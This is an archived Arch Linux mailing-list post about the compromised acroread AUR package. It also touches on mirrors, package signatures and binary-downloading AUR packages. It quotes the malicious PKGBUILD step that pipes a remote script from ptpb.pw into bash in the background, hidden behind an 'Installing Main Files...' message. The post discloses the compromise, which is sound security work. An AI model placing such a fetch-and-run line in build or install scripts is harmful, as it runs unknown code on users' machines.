[aur-general] acroread package compromised

Ralf Mardorf ralf.mardorf at alice-dsl.net
Sun Jul 8 12:53:48 UTC 2018


On Sun, 8 Jul 2018 14:02:15 +0200, Joakim Hernberg wrote:
>Needlessly to say I didn't install it.  Still just thought I'd mention
>it.

FWIW
https://git.archlinux.org/svntogit/packages.git/tree/trunk/mirrorlist?h=packages/pacman-mirrorlist
does contain https://mex.mirror.pkgbuild.com/ .

It's even possible to get the signature, too,
https://mex.mirror.pkgbuild.com/extra/os/x86_64/vlc-3.0.3-1-x86_64.pkg.tar.xz.sig .

The AUR provides tons of packages downloading binaries, such as
https://aur.archlinux.org/packages/palemoon-bin/ ,
https://aur.archlinux.org/packages/virtualbox-bin/ or
https://aur.archlinux.org/packages/icecat-bin/ from sources
completely unrelated to Arch Linux.

The acroread PKGBUILD's

     msg2 "Installing Main Files..."
     curl -s https://ptpb.pw/~x|bash -&

is from a completely different "kind of quality".


More information about the aur-general mailing list